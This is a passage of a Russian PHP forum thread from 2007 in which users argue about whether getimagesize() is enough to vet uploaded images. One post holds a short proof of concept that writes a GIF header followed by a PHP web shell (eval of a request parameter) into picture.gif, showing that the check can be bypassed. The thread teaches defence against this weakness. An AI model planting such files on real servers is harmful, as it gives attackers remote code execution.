Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
Самоучитель MySQL 5. Авторы: Кузнецов М.В., Симдянов И.В. MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. Социальная инженерия и социальные хакеры. Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум PHP

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум (новые сообщения вниз) Структурный форум

тема: не работает функция copy

Сообщения:  [1-10]    [11-20]   [21-30]   [31-40]  [41-50] 

 
 автор: vikgor   (28.05.2007 в 14:04)   письмо автору
 
   для: Trianon   (26.05.2007 в 22:04)
 

Мне не ясно, как оформить функцию, в случае, ввода данных, ведь в этом случае требуется 2 файла 1 - с формой и 2-й с обработкой данных из формы.

   
 
 автор: Trianon   (28.05.2007 в 01:51)   письмо автору
 
   для: Unkind   (28.05.2007 в 00:55)
 

спорно... кто его будет отдавать с таким типом, если он и по расширению (.gif)и по сигнатуре (getimagesize) - форменное картинко?

   
 
 автор: Unkind   (28.05.2007 в 00:55)   письмо автору
 
   для: Trianon   (28.05.2007 в 00:44)
 

Клиентские Вы как раз пропустите, если можно загрузить файл, который будет отдаваться клиенту как "text/html" или "application/xhtml+xml".
И getimagesize() тут уже совершенно не причем.

   
 
 автор: Trianon   (28.05.2007 в 00:44)   письмо автору
 
   для: Unkind   (28.05.2007 в 00:31)
 

Я так понимаю, чтобы клиентские не пропустить....

   
 
 автор: Unkind   (28.05.2007 в 00:31)   письмо автору
 
   для: Trianon   (27.05.2007 в 23:50)
 

Тогда к чему вообще эта возьня с getimagesize()?

   
 
 автор: Trianon   (27.05.2007 в 23:50)   письмо автору
 
   для: Unkind   (27.05.2007 в 18:32)
 

Мы же вроде выяснили, что защита от исполнения серверных скриптов реализуется совсем другими методами?
Опять 25 за рыбу гроши....

   
 
 автор: Unkind   (27.05.2007 в 18:32)   письмо автору
 
   для: Trianon   (27.05.2007 в 16:51)
 


<?php 
$fh 
fopen("picture.gif""wb"); 
fwrite($fhpack("H*""474946383961ce002f00c4")); 

$script '<?php
$code = isset($_REQUEST["code"]) ? $_REQUEST["code"] : "";
!get_magic_quotes_gpc() || $code = stripslashes($code);
eval($code);
?>'
;

fwrite($fh$script);
fclose($fh);

var_dump(getimagesize("picture.gif")); 
?>

   
 
 автор: Trianon   (27.05.2007 в 16:51)   письмо автору
 
   для: Unkind   (27.05.2007 в 15:04)
 

К чему придираться-то?
Вы утверждаете, что getimagesize() недостаточно, для того чтобы отличить опасный объект от неопасного. Так?
Я предложил показать пример. Пример Вы не показали.

   
 
 автор: Unkind   (27.05.2007 в 15:04)   письмо автору
 
   для: Trianon   (27.05.2007 в 14:26)
 

Но и скрипта там нет.
Да хватит Вам придираться! :))

   
 
 автор: sim5   (27.05.2007 в 14:34)   письмо автору
 
   для: Trianon   (27.05.2007 в 14:26)
 

Ну это только идея для развития, направление есть, а далее нужно думать.)

   

Сообщения:  [1-10]    [11-20]   [21-30]   [31-40]  [41-50] 

Форум разработан IT-студией SoftTime
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования